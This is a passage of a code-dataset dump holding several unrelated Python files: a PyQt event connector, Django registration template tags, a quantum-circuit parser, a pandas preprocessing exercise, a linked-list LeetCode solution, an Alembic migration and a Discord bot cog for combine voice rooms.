set()\n\t\tCONNECTOR.addObject(self)\n\n\tdef categories(self):\n\t\t\"\"\"Return categories of the object.\"\"\"\n\t\treturn self._categories\n\n\tdef addCategory(self, 
c):\n\t\t\"\"\"Add a category to the object.\"\"\"\n\t\tif c in self._categories:\n\t\t\treturn\n\t\tself._categories.add(c)\n\t\tCONNECTOR.addCategory(self, c)\n\n\tdef removeCategory(self, c):\n\t\t\"\"\"Remove a category from an object.\"\"\"\n\t\tif c not in self._categories:\n\t\t\treturn\n\t\tself._categories.remove(c)\n\t\tCONNECTOR.removeCategory(self, c)\n\n\ndef peekSet(s):\n\treturn next(iter(s))\n\n\ndef isAncestorOf(ancestor, child):\n\t\"\"\"Return True if `ancestor` is an ancestor of `child`, QObject-tree-wise.\"\"\"\n\twhile child is not None:\n\t\tif child is ancestor:\n\t\t\treturn True\n\t\tchild = child.parent()\n\treturn False\n\n\ndef categoryObjects(categories, ancestor=None):\n\t\"\"\"Return objects matching all specified categories.\n\n\t:param categories: matching object should match _all_ these categories\n\t:type categories: list or str\n\t:param ancestor: if not None, only objects that are children of `ancestor` are returned\n\t\"\"\"\n\tif ancestor is None:\n\t\treturn CONNECTOR.objectsMatching(categories)\n\telse:\n\t\treturn [obj for obj in CONNECTOR.objectsMatching(categories) if isAncestorOf(ancestor, obj)]\n\n\ndef deleteCreatedBy(caller):\n\t\"\"\"Unregister listeners registered by script `caller`.\n\n\tIf `caller` script file had registered any listeners (as with :any:`registerSignal`), this method\n\tunregisters them.\n\n\tThis can be useful to unregister all listeners from a script to re-run the script afterwards, to\n\tavoid listeners be registered (and listening) twice.\n\n\t:param caller: path of the script that registered listeners\n\t:type caller: str\n\t\"\"\"\n\tCONNECTOR.deleteCreatedBy(caller)\n\n\ndef registerSignal(categories, signal, stackoffset=0):\n\t\"\"\"Decorate a function that should be run when a signal is emitted.\n\n\tWhen the `signal` of all existing and future objects matching all specified `categories`\n\tis emitted, the decorated function will be called.\n\n\tWhen called, the decorated function will received the target object as first argument, then\n\tthe signal arguments as next arguments.\n\n\t:param categories: the categories to match\n\t:type categories: list or str\n\n\tExample::\n\n\t\t@registerSignal('editor', 'fileSaved')\n\t\tdef foo(editor_obj, path):\n\t\t\tprint('file %s has been saved', path)\n\t\"\"\"\n\n\tcategories = frozenset(to_stringlist(categories))\n\tdoctext = ('This handler is registered for categories ``%s`` on signal ``%s``.'\n\t\t\t\t % (list(categories), signal))\n\n\tif BUILDING_DOCS:\n\t\treturn lambda x: _addDoc(x, doctext)\n\n\tdef deco(func):\n\t\tcaller = inspect.stack()[1 + stackoffset][1]\n\n\t\tlis = SignalListener(func, categories, signal, CONNECTOR)\n\t\tlis.caller = caller\n\t\tCONNECTOR.addListener(categories, lis)\n\n\t\t_addDoc(func, doctext)\n\n\t\treturn func\n\n\treturn deco\n\n\ndef registerSetup(categories, stackoffset=0):\n\t\"\"\"Decorate a function that should be run for all objects matching categories.\n\n\tWhen an object is created that matches `categories` or an object is being added new categories and they match\n\tthe specified `categories`, the decorated function will be called.\n\tAlso, when the function is decorated, it is called for all existing objects matching `categories`.\n\n\tThe decorated function will received the matching object as only argument.\n\n\t:param categories: the categories to match\n\t:type categories: list or str\n\n\tExample::\n\n\t\t@registerSetup('editor')\n\t\tdef foo(editor_obj):\n\t\t\tprint('an editor has been 
created')\n\t\"\"\"\n\n\tcategories = frozenset(to_stringlist(categories))\n\tdoctext = 'This handler is registered as setup for categories ``%s``.' % (list(categories),)\n\n\tif BUILDING_DOCS:\n\t\treturn lambda x: _addDoc(x, doctext)\n\n\tdef deco(func):\n\t\tcaller = inspect.stack()[1 + stackoffset][1]\n\n\t\tlis = SetupListener(func, categories)\n\t\tlis.caller = caller\n\t\tCONNECTOR.addListener(categories, lis)\n\n\t\t_addDoc(func, doctext)\n\n\t\treturn func\n\n\treturn deco\n\n\ndef registerTeardown(categories, stackoffset=0):\n\tcategories = frozenset(to_stringlist(categories))\n\tdoctext = 'This handler is registered as teardown for categories ``%s``.' % (list(categories),)\n\n\tif BUILDING_DOCS:\n\t\treturn lambda x: _addDoc(x, doctext)\n\n\tdef deco(func):\n\t\tcaller = inspect.stack()[1 + stackoffset][1]\n\n\t\tlis = TearListener(func, categories)\n\t\tlis.caller = caller\n\t\tCONNECTOR.addListener(categories, lis)\n\n\t\t_addDoc(func, doctext)\n\n\t\treturn func\n\n\treturn deco\n\n\n\ndef registerEventFilter(categories, eventTypes, stackoffset=0):\n\t\"\"\"Decorate a function that should be run when an event is sent to an object.\n\n\tWhen a :any:`PyQt5.QtCore.QEvent` object of a type in `eventTypes` is sent to an object\n\tmatching `categories`, the decorated function will be called.\n\n\tThe decorated function must take 2 parameters: the destination object to which the event\n\tis sent and the event itself.\n\n\tIf the value returned by the decorated function is True, the sent event will be filtered:\n\tit will not reach the destination object, and it will not be processed by any other\n\tevent-filters, registered by standard Qt functions or by :any:`registerEventFilter`.\n\n\tIf the value returned by the decorated function is False or is omitted (it is None then),\n\tthe event will continue its route through other event-filters and to the destination\n\tobject.\n\n\tSee also :any:`PyQt5.QtCore.QObject.eventFilter` and\n\t:any:`PyQt5.QtCore.QObject.installEventFilter`.\n\n\tExample::\n\n\t\t@registerEventFilter('window', [QEvent.Close])\n\t\tdef onWinClose(window, event):\n\t\t\tprint('the %s window was closed' % window)\n\n\t:param categories: the categories to match\n\t:type categories: list or str\n\t:param eventTypes: list of accepted ``QEvent.type()`` the sent event should match\n\t:type eventTypes: list of ints\n\t:rtype: bool\n\t\"\"\"\n\n\tcategories = frozenset(to_stringlist(categories))\n\tdoctext = ('This handler is registered as event filter for categories ``%s`` with '\n\t\t\t 'event types ``%r``.' 
% (list(categories), eventTypes))\n\n\tif BUILDING_DOCS:\n\t\treturn lambda x: _addDoc(x, doctext)\n\n\tdef deco(func):\n\t\tcaller = inspect.stack()[1 + stackoffset][1]\n\n\t\tlis = EventFilter(func, categories, eventTypes, CONNECTOR)\n\t\tlis.caller = caller\n\t\tCONNECTOR.addListener(categories, lis)\n\n\t\t# TODO use textual event type (parse source)\n\t\t_addDoc(func, doctext)\n\n\t\treturn func\n\n\treturn deco\n\n\ndef disabled(func):\n\t\"\"\"Disable a function previously decorated with a listener like registerSignal.\n\n\tIf the decorated function (`func`) has been decorated with :any:`registerSignal`,\n\t:any:`registerEventFilter` or some other kind of listener decorator, the decorated function\n\twill not be called anymore when a matching signal is emitted or a event has to pass in a\n\tfilter, until it is enabled again.\n\n\tThis decorator simply sets an ``enabled`` attribute on the decorated function to False.\n\tTo re-enable the disabled function, just set the ``enabled`` attribute to True.\n\n\tWhen the function is re-enabled, missed signals and events will not cause the decorated\n\tfunction to be called, but upcoming signals/events will trigger the decorated function.\n\n\tSince functions decorated with :any:`registerSetup` can be triggered only when an object\n\t_starts_ matching categories, re-enabling such a function will not catch-up the setup of\n\tan object.\n\t\"\"\"\n\tfunc.enabled = False\n\n\tdoctext = 'This handler is disabled by default.'\n\t_addDoc(func, doctext)\n\n\treturn func\n\n\ndefaultEditorConfig = registerSetup('editor')\n\n\"\"\"Decorate a function that should be called for every editor.\n\nThis decorator is intended for functions to configure editor widgets.\nSee also :any:`registerSetup`.\n\"\"\"\n\ndefaultWindowConfig = registerSetup('window')\n\n\"\"\"Decorate a function that should be called for every EYE window.\n\nThis decorator is intended for functions to configure EYE windows.\nSee also :any:`registerSetup`.\n\"\"\"\n\ndefaultLexerConfig = registerSignal(['editor'], 'lexerChanged')\n\n\"\"\"Decorate a function that should be called when a lexer is set for an editor.\n\nThis decorator is intended for functions to configure lexers.\n\"\"\"\n\nCONNECTOR = EventConnector()\n","sub_path":"eye/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":15197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"120434378","text":"from registrasion.models import commerce\nfrom registrasion.controllers.category import CategoryController\nfrom registrasion.controllers.item import ItemController\n\nfrom django import template\nfrom django.db.models import Sum\nfrom urllib import urlencode\n\nregister = template.Library()\n\n\ndef user_for_context(context):\n ''' Returns either context.user or context.request.user if the former is\n not defined. '''\n try:\n return context[\"user\"]\n except KeyError:\n return context.request.user\n\n\n@register.assignment_tag(takes_context=True)\ndef available_categories(context):\n ''' Gets all of the currently available products.\n\n Returns:\n [models.inventory.Category, ...]: A list of all of the categories that\n have Products that the current user can reserve.\n\n '''\n return CategoryController.available_categories(user_for_context(context))\n\n\n@register.assignment_tag(takes_context=True)\ndef missing_categories(context):\n ''' Adds the categories that the user does not currently have. 
'''\n    user = user_for_context(context)\n    categories_available = set(CategoryController.available_categories(user))\n    items = ItemController(user).items_pending_or_purchased()\n\n    categories_held = set()\n\n    for product, quantity in items:\n        categories_held.add(product.category)\n\n    return categories_available - categories_held\n\n\n@register.assignment_tag(takes_context=True)\ndef available_credit(context):\n    ''' Calculates the sum of unclaimed credit from this user's credit notes.\n\n    Returns:\n        Decimal: the sum of the values of unclaimed credit notes for the\n            current user.\n\n    '''\n\n    notes = commerce.CreditNote.unclaimed().filter(\n        invoice__user=user_for_context(context),\n    )\n    ret = notes.values(\"amount\").aggregate(Sum(\"amount\"))[\"amount__sum\"] or 0\n    return 0 - ret\n\n\n@register.assignment_tag(takes_context=True)\ndef invoices(context):\n    '''\n\n    Returns:\n        [models.commerce.Invoice, ...]: All of the current user's invoices. '''\n    return commerce.Invoice.objects.filter(user=user_for_context(context))\n\n\n@register.assignment_tag(takes_context=True)\ndef items_pending(context):\n    ''' Gets all of the items that the user from this context has reserved.\n\n    The user will be either `context.user`, or `context.request.user` if\n    the former is not defined.\n    '''\n\n    return ItemController(user_for_context(context)).items_pending()\n\n\n@register.assignment_tag(takes_context=True)\ndef items_purchased(context, category=None):\n    ''' Returns the items purchased for this user.\n\n    The user will be either `context.user`, or `context.request.user` if\n    the former is not defined.\n    '''\n\n    return ItemController(user_for_context(context)).items_purchased(\n        category=category\n    )\n\n\n@register.assignment_tag(takes_context=True)\ndef total_items_purchased(context, category=None):\n    ''' Returns the number of items purchased for this user (sum of quantities).\n\n    The user will be either `context.user`, or `context.request.user` if\n    the former is not defined.\n    '''\n\n    return sum(i.quantity for i in items_purchased(context, category))\n\n\n@register.assignment_tag(takes_context=True)\ndef report_as_csv(context, section):\n\n    old_query = context.request.META[\"QUERY_STRING\"]\n    query = dict([(\"section\", section), (\"content_type\", \"text/csv\")])\n    querystring = urlencode(query)\n\n    if old_query:\n        querystring = old_query + \"&\" + querystring\n\n    return context.request.path + \"?\" + querystring\n","sub_path":"registrasion/templatetags/registrasion_tags.py","file_name":"registrasion_tags.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"483361268","text":"# parser.py\n# Nov 30 2010\n# Yu Tomita (yu.t@gatech.edu)\n#\n# Creates a list of operation objects from an input file.\n\nimport re\nfrom messObj import Qubit,Operation\n\ndef read_file(filename,initial_value_file=None):\n\tf = open(filename)\n\tqubits_dic = {}\n\toperations = []\n\tfor one in f:\n\t\tline = one.split()\n\t\tif len(line)<2:\n\t\t\tcontinue\n\t\ttry:\n\t\t\tgate = line[0]\n\t\t\tqubs = line[1].split(',')\n\t\t\ttime = int(re.findall('[0-9]+',line[-1])[0])\n\t\t\tqubits = []\n\t\t\tfor q in qubs:\n\t\t\t\tif q not in qubits_dic:\n\t\t\t\t\tqubits_dic[q] = Qubit(label=q)\n\t\t\t\tqubits.append(qubits_dic[q])\n\t\t\toperations.append(Operation(gate[0],qubits,False))\n\t\texcept (ValueError,TypeError,IndexError):\n\t\t\tem = 'Error: could not understand the line\\n'\n\t\t\tem += ' line #%d-> %s' % (len(operations)+1, 
one)\n\t\t\traise SystemExit(em)\n\t\t\t\n\t# list of qubits sorted by labels\n\tqubits = [qubits_dic[a] for a in sorted(qubits_dic)]\n\treturn (qubits,operations)\n\ndef replace_ent(operations):\n\tsize = len(operations)\n\tfor i in range(size-1,-1,-1):\n\t\topr = operations[i]\n\t\tif opr.gate[0]=='E':\n\t\t\toperations.pop(i)\n\t\t\tnewOprs = [Operation('H',[opr.qubits[0]],opr.error),\n\t\t\t\t \tOperation('C_elu',opr.qubits[:],opr.error),\n\t\t\t\t\tOperation('X',[opr.qubits[0]],opr.error)]\n\t\t\tfor n in newOprs[::-1]:\n\t\t\t\toperations.insert(i,n)\n","sub_path":"mess/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"281249934","text":"# -*- coding: utf-8 -*-\ndef preprocessing(data):\n    \"\"\"对data进行预处理\n    参数:\n        data - pandas.dataframe格式,原始数据\n\n    返回值:\n        processed_data - 预处理后的数据\n    \"\"\"\n    processed_data = data\n    # 请在此添加实现代码 #\n    #********** Begin *********#\n    # print(data)\n    # 删除拥有缺失值的行\n    processed_data.dropna(axis=0,how='any',inplace=True)\n    # 删除重复的数据\n    #for column in data.columns:\n    #    column_data = data[column] # 某列的数据\n    # 对该列进行缺失值删除\n    # for i in range(len(column_data)):\n    #     if column_data[i] is None:\n    # 删除该index 对应的行\n    #         processed_data.drop(processed_data.index[i],inplace=True)\n    # 处理Sector_score字段 最大值为 最小值为\n    min = data['Sector_score'].min()\n    max = data['Sector_score'].max()\n    #print('最小值',min)\n    # print('最大值',max)\n    # 处理Location_id 将字符串的行删除\n    print(len(processed_data))\n    location_id = processed_data['LOCATION_ID'] # 字段值\n    id_len = len(location_id) # 字段长度\n    print('location_id长度',id_len)\n    for i in range(id_len):\n        if location_id[i].isalpha():\n            print('索引',i) \n    #\n    # Detection_Risk字段都是0.5唯一值,不具有分析价值,删除掉\n    del processed_data['Detection_Risk']\n    \n    #********** End ***********#\n    return processed_data","sub_path":"Train2/preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"64345532","text":"\"\"\"\nhttps://leetcode.com/problems/reverse-nodes-in-k-group/\n\nGiven a linked list, reverse the nodes of a linked list k at a time and return its modified list.\n\nIf the number of nodes is not a multiple of k then left-out nodes in the end should remain as it is.\n\nYou may not alter the values in the nodes, only nodes itself may be changed.\n\nOnly constant memory is allowed.\n\nFor example,\nGiven this linked list: 1->2->3->4->5\n\nFor k = 2, you should return: 2->1->4->3->5\n\nFor k = 3, you should return: 3->2->1->4->5\n\"\"\"\n\n\n# Definition for singly-linked list.\nclass ListNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\n\nclass SolutionLong(object):\n\n    # Return kth node from start\n    def findKth(self, start, k):\n        if not start:\n            return None\n\n        # assumes k > 0\n        kth = start\n        for _ in xrange(k-1):\n            if kth.next:\n                kth = kth.next\n            else:\n                return None\n        return kth\n\n    def reverse(self, start, end):\n        # assumes start != end\n        prev, curr = start, start.next\n\n        while True:\n            next_ = curr.next\n            curr.next = prev\n            if curr == end:\n                break\n            prev, curr = curr, next_\n\n    def reverseKGroup(self, head, k):\n        \"\"\"\n        :type head: ListNode\n        :type k: int\n        :rtype: ListNode\n        \"\"\"\n        if k < 2:\n            return head\n\n        curr, new_head, trail = head, None, None\n\n        while True:\n            kth = self.findKth(curr, k)\n            if not kth:\n                break\n\n            next_ = kth.next # next_ symbolizes the start of the next 
segment to possibly reverse\n self.reverse(curr, kth)\n if not new_head:\n new_head = kth\n\n curr.next = next_ # in case the next segment doesn't need to be reversed\n if trail:\n # e.g. 1 2 3 4, k = 2\n # link 1 to 4 between 2->1 and 4->3\n trail.next = kth\n trail = curr\n curr = next_\n\n if not new_head:\n return head\n\n return new_head\n","sub_path":"lc/reverse_nodes_k_group.py","file_name":"reverse_nodes_k_group.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"135623052","text":"\"\"\"add onlines table\n\nRevision ID: d254e891c7fc\nRevises: 40c9abe1bafb\nCreate Date: 2016-12-18 09:26:38.937172\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd254e891c7fc'\ndown_revision = '40c9abe1bafb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('onlines',\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('sid', sa.String(length=128), nullable=False),\n sa.Column('lastactive', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('user_id', 'sid')\n )\n op.create_index(op.f('ix_onlines_sid'), 'onlines', ['sid'], unique=False)\n op.create_index(op.f('ix_onlines_user_id'), 'onlines', ['user_id'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_onlines_user_id'), table_name='onlines')\n op.drop_index(op.f('ix_onlines_sid'), table_name='onlines')\n op.drop_table('onlines')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/d254e891c7fc_add_onlines_table.py","file_name":"d254e891c7fc_add_onlines_table.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"385144108","text":"import discord\nfrom redbot.core import Config\nfrom redbot.core import commands\nfrom redbot.core import checks\n\n# TODO:\n# - custom combines_info message\ndefaults = {\"players_per_room\": 6, \"room_capacity\": 10, \"combines_category\": None, \"public_combines\": True, \"acronym\": \"RSC\"}\n\n\nclass CombineRooms(commands.Cog):\n def __init__(self, bot):\n self.config = Config.get_conf(self, identifier=1234567892, force_registration=True)\n self.config.register_guild(**defaults)\n self.team_manager_cog = bot.get_cog(\"TeamManager\")\n\n @commands.command(aliases=[\"startcombines\", \"stopcombines\"])\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def combines(self, ctx, *keywords):\n \"\"\"\n Creates rooms for combines, or tears them down depending on the action parameter. 
If no parameter is given, it will behave as a switch.\n        \n        Examples:\n        [p]combines\n        [p]combines start\n        [p]combines stop\n        \"\"\"\n        keywords = set(keywords)\n        # is_public = not bool(keywords & set([\"private\"]))\n\n        if bool(keywords & set([\"start\", \"create\"])):\n            done = await self._start_combines(ctx)\n        elif bool(keywords & set([\"stop\", \"end\"])):  # was a duplicate of the start condition, which made stop unreachable\n            done = await self._stop_combines(ctx)\n        else:\n            combines_ongoing = await self._combines_category(ctx.guild)\n            if combines_ongoing:\n                done = await self._stop_combines(ctx)\n            else:\n                done = await self._start_combines(ctx)\n        if done:\n            await ctx.send(\"Done\")\n        return\n        \n    @commands.command(aliases=[\"sppr\"])\n    @commands.guild_only()\n    @checks.admin_or_permissions(manage_guild=True)\n    async def setPlayersPerRoom(self, ctx, size: int):\n        \"\"\"\n        Sets the recommended amount of concurrent players in combine rooms. (Default: 6)\n        \"\"\"\n\n        if size < 2:\n            await ctx.send(\":x: There is a minimum of 2 players per voice channel.\")\n            return False \n        combines_cat = await self._save_players_per_room(ctx.guild, size)\n        # DISABLED: room size in name\n        # if combines_cat and False:\n        #     for vc in combines_cat.voice_channels:\n        #         await self._adjust_room_(guild, vc)\n        await ctx.send(\"Done\")\n        return True\n    \n    @commands.command(aliases=[\"ppr\"])\n    @commands.guild_only()\n    async def getPlayersPerRoom(self, ctx):\n        \"\"\"\n        Gets the recommended amount of concurrent players in combine rooms.\n        \"\"\"\n        size = await self._players_per_room(ctx.guild)\n        await ctx.send(\"Combines should have no more than {0} active players in them.\".format(size))\n\n    @commands.command(aliases=[\"setroomcap\", \"src\"])\n    @commands.guild_only()\n    @checks.admin_or_permissions(manage_guild=True)\n    async def setRoomCapacity(self, ctx, size: int):\n        \"\"\"\n        Sets the maximum number of members allowed in combine voice channels. (Default: 10)\n        \"\"\"\n        if size < 2:\n            await ctx.send(\":x: There is a minimum of 2 players per voice channel.\")\n            return False \n        combines_cat = await self._save_room_capacity(ctx.guild, size)\n        if await self._combines_category(ctx.guild):  # the coroutine must be awaited, otherwise this check is always truthy\n            await ctx.send(\"Done: Changes will not be applied to rooms that are already up.\")\n        else:\n            await ctx.send(\"Done\")\n        return True\n\n    @commands.command(aliases=[\"roomcap\", \"grc\"])\n    @commands.guild_only()\n    @checks.admin_or_permissions(manage_guild=True)\n    async def getRoomCapacity(self, ctx):\n        \"\"\"\n        Gets the current capacity of combine voice rooms (Default: 10)\n        This capacity is for all members, players and scouts combined.\n        \"\"\"\n        cap = await self._room_capacity(ctx.guild)\n        await ctx.send(\"Combines currently have a maximum size of {0} members.\".format(cap))\n        return\n
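\n    # --- Illustrative aside (not part of the original cog): the keyword dispatch in\n    # [p]combines above boils down to a small pure function; the helper name below is\n    # made up for clarity, and the asserts show the intended behaviour.\n    # def resolve_combine_action(keywords, combines_ongoing):\n    #     if keywords & {\"start\", \"create\"}:\n    #         return \"start\"\n    #     if keywords & {\"stop\", \"end\"}:\n    #         return \"stop\"\n    #     return \"stop\" if combines_ongoing else \"start\"  # bare [p]combines acts as a switch\n    # assert resolve_combine_action({\"start\"}, False) == \"start\"\n    # assert resolve_combine_action(set(), True) == \"stop\"\n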
\n    @commands.command(aliases=[\"togglePub\", \"toggleCombines\", \"togglePublicCombine\", \"tpc\", \"toggleCombinePermissions\", \"tcp\"])\n    @commands.guild_only()\n    @checks.admin_or_permissions(manage_guild=True)\n    async def togglePublicity(self, ctx):\n        \"\"\"\n        Toggles the status (public/private) of the combines. (Default: Public)\n        If combines are **Public**, any member may participate.\n        If combines are **Private**, only members with the \"League\" role may participate.\n        \"\"\"\n        is_public = await self._toggle_public_combine(ctx.guild)\n        await self._update_combine_permissions(ctx.guild)\n\n        public_str = \"public\" if is_public else \"private\"\n        response = \"Combines are now **{0}**.\".format(public_str)\n        await ctx.send(response)\n\n    @commands.command(aliases=[\"checkCombinePublicity\", \"ccp\", \"combineStatus\", \"checkCombineStatus\", \"ccs\"])\n    @commands.guild_only()\n    @checks.admin_or_permissions(manage_guild=True)\n    async def combinePublicity(self, ctx):\n        \"\"\"\n        Gets the current status (public/private) of the combines.\n        If combines are **Public**, any member may participate.\n        If combines are **Private**, only members with the \"League\" role may participate.\n        \"\"\"\n        public_str = \"public\" if await self._is_public_combine(ctx.guild) else \"private\"\n        response = \"Combines are currently **{0}**.\".format(public_str)\n        await ctx.send(response)\n\n    @commands.command(aliases=[\"getAcronym\"])\n    @commands.guild_only()\n    @checks.admin_or_permissions(manage_guild=True)\n    async def acronym(self, ctx):\n        \"\"\"\n        Gets the acronym registered for combines. (Default: RSC)\n        \"\"\"\n        acronym = await self._get_acronym(ctx.guild)\n        await ctx.send(\"The acronym registered for the combines cog is **{0}**.\".format(acronym))\n\n    @commands.command()\n    @commands.guild_only()\n    @checks.admin_or_permissions(manage_guild=True)\n    async def setAcronym(self, ctx, new_acronym: str):\n        \"\"\"\n        Sets the server acronym used in the combines category. (Default: RSC)\n        This is mostly used in the #combine-details message\n        \"\"\"\n        await self._save_acronym(ctx.guild, new_acronym)\n        await ctx.send(\"The acronym has been registered as **{0}**.\".format(new_acronym))\n\n    @commands.Cog.listener(\"on_voice_state_update\")\n    async def on_voice_state_update(self, member, before, after):\n        combines_ongoing = await self._combines_category(member.guild)\n\n        # ignore when combines are not ongoing, or when voice activity is within the same room\n        if not combines_ongoing or before.channel == after.channel:\n            return\n        \n        # Room joined:\n        await self._member_joins_voice(member, after.channel)\n        # Room left:\n        await self._member_leaves_voice(member, before.channel) # TODO: consider disconnected case #@me what does that even mean? this structure should cover everything\n
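\n    # --- Illustrative aside: the voice-state handling above reduces to this decision\n    # table (plain values stand in for discord channels; the helper name is made up).\n    # def classify_voice_event(before_channel, after_channel):\n    #     if before_channel == after_channel:\n    #         return []  # mute/deafen toggles land here; nothing to do\n    #     events = []\n    #     if after_channel is not None:\n    #         events.append((\"joined\", after_channel))\n    #     if before_channel is not None:\n    #         events.append((\"left\", before_channel))\n    #     return events  # a plain disconnect yields only a \"left\" event\n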
\n    async def _start_combines(self, ctx):\n        # Creates combines category and rooms for each tier\n        combines_category = await self._add_combines_category(ctx, \"Combine Rooms\")\n        await self._save_combine_category(ctx.guild, combines_category)\n\n        if combines_category:\n            await self._add_combines_info_channel(ctx.guild, combines_category, \"Combines Details\")\n            for tier in await self.team_manager_cog.tiers(ctx):\n                await self._add_combines_voice(ctx.guild, combines_category, tier)\n            return True\n        return False\n\n    async def _stop_combines(self, ctx):\n        # remove combines channels, category\n        combines_category = await self._combines_category(ctx.guild)\n        if combines_category:\n            for channel in combines_category.channels:\n                await channel.delete()\n            await combines_category.delete()\n            return True\n        await ctx.send(\"Could not find combine rooms.\")\n        return False\n    \n    async def _update_combine_permissions(self, guild: discord.Guild):\n        combines_category = await self._combines_category(guild)\n        is_public = await self._is_public_combine(guild)\n\n        if combines_category:\n            league_role = self._get_role_by_name(guild, \"League\")\n            # apply the overwrites directly on the existing category\n            await combines_category.set_permissions(guild.default_role, view_channel=is_public, connect=is_public, send_messages=False)\n            await combines_category.set_permissions(league_role, view_channel=True, connect=True, send_messages=False)\n    \n    async def _add_combines_category(self, ctx, name: str):\n        category = await self._combines_category(ctx.guild)\n        # check if category exists already\n        if category:\n            await ctx.send(\"A category with the name \\\"{0}\\\" already exists\".format(name))\n            return None\n        \n        if not await self._is_public_combine(ctx.guild):\n            league_role = self._get_role_by_name(ctx.guild, \"League\")\n            overwrites = {\n                ctx.guild.default_role: discord.PermissionOverwrite(view_channel=False, connect=False, send_messages=False),\n                league_role: discord.PermissionOverwrite(view_channel=True, connect=True, send_messages=False)\n            }\n        else:\n            overwrites=None\n\n        category = await ctx.guild.create_category(name, overwrites=overwrites)\n        return category\n\n    async def _maybe_remove_combines_voice(self, guild: discord.Guild, voice_channel: discord.VoiceChannel):\n        tier = self._get_voice_tier(voice_channel)\n        category = await self._combines_category(guild)\n        tier_voice_channels = []\n        for vc in category.voice_channels:\n            if tier in vc.name:\n                tier_voice_channels.append(vc)\n        \n        # Never remove the last room for a tier\n        if len(tier_voice_channels) == 1:\n            return False\n\n        # Always retain room 1 for tier:\n        # await voice_channel.delete()\n        i = voice_channel.name.index(\"room \") + 5\n        # DISABLED: active players in room name\n        # j = voice_channel.name.index(\" (\")\n        room_num = int(voice_channel.name[i:]) # j])\n        room_one_empty = (room_num == 1)\n\n        # if voice_channel was not room 1\n        if not room_one_empty:\n            # No need to kick scouts. 
Let them hang out :)\n if voice_channel.members:\n return False\n await voice_channel.delete()\n return True\n \n # delete the other empty room (instead of room 1)\n for vc in tier_voice_channels:\n if not vc.members and vc != voice_channel:\n await vc.delete()\n return True\n\n async def _add_combines_info_channel(self, guild: discord.Guild, category: discord.CategoryChannel, name: str):\n overwrites = {\n guild.default_role: discord.PermissionOverwrite(send_messages=False)\n }\n tc = await category.create_text_channel(name, position=0, permissions_synced=True, overwrites=overwrites)\n\n acronym = await self._get_acronym(guild)\n info_message = (\n \"Welcome to the {0} combines! Combine rooms will be available to all players who are Free Agents or Draft Eligible. \"\n \"During combines, you are welcome to spend as much or as little time playing as you'd like. Your participation in combines \"\n \"gives franchise scouts an opportunity to see how you play. No pressure though! The primary goal for combines is to give \"\n \"everybody an opportunity to get introduced to gameplay at their respective tiers.\"\n\n \"\\n\\n__Server Information__\"\n \"\\nServers can be made by anybody in the combine room. We do ask that the lobbies are made with the following naming convention:\"\n \"\\n\\n**Lobby Info:**\"\n \"\\n - Name: ****\"\n \"\\n - Password: **{1}**\"\n \n \"\\n\\n**Example:**\"\n \"\\n - Voice Channel Name: **Challenger room 4**\"\n \"\\n - Name: **Challenger4**\"\n \"\\n - Password: **{1}4**\"\n\n \"\\n\\n__The Role of Scouts__\"\n \"\\n - For lack of a better phrase, scouts are \\\"in charge\\\" of running combines.\"\n \"\\n - If a scout requests a lineup, please respect this request.\"\n \"\\n - If a scout requests for mutator settings such as adjusted time length, or a goal limit, please respect this request.\"\n \"\\n - If you have concerns with how combines are being run, contact a mod or an admin.\"\n\n \"\\n\\n__Other Notes__\"\n \"\\n - Please try to curb your particpation in combines towards your own tier. Do not play outside of your tier without being requested \"\n \"by a scout, or asking permission of the other players in the combine room.\"\n \"\\n - Don't stress! All players have good and bad days. Scouts care more about _how you play_ than _how your perform_. 
If you have a \"\n \"rough game, or a bad night, you'll have plenty of opportunity to show your abilities in remaining combine games\"\n \"\\n - As per {2} rules, do not be toxic or hostile towards other players.\"\n \"\\n - GLHF!\"\n ).format(guild.name, acronym.lower(), acronym)\n await tc.send(info_message)\n \n async def _add_combines_voice(self, guild: discord.Guild, category: discord.CategoryChannel, tier: str):\n # user_limit of 0 means there's no limit\n # determine position with same name +1\n tier_rooms = []\n for vc in category.voice_channels:\n if tier in vc.name:\n tier_rooms.append(vc)\n\n room_makeable = False\n new_position = None\n new_room_number = 1\n while not room_makeable:\n room_makeable = True\n for vc in tier_rooms:\n i = vc.name.index(\"room \") + 5\n # DISABLED: room count in name\n # j = vc.name.index(\" (\")\n vc_room_num = int(vc.name[i:]) # j])\n if vc_room_num == new_room_number:\n new_room_number += 1\n new_position = vc.position\n room_makeable = False\n \n # DISABLED: room count in name\n # ppr = await self._players_per_room(guild)\n capacity = await self._room_capacity(guild)\n # room_name = \"{0} room {1} (0/{2})\".format(tier, new_room_number, ppr)\n room_name = \"{0} room {1}\".format(tier, new_room_number)\n\n if not new_position:\n await category.create_voice_channel(room_name, permissions_synced=True, user_limit=capacity)\n else:\n await category.create_voice_channel(room_name, permissions_synced=True, user_limit=capacity, position=new_position)\n\n async def _member_joins_voice(self, member: discord.Member, voice_channel: discord.VoiceChannel):\n combines_category = await self._combines_category(member.guild)\n 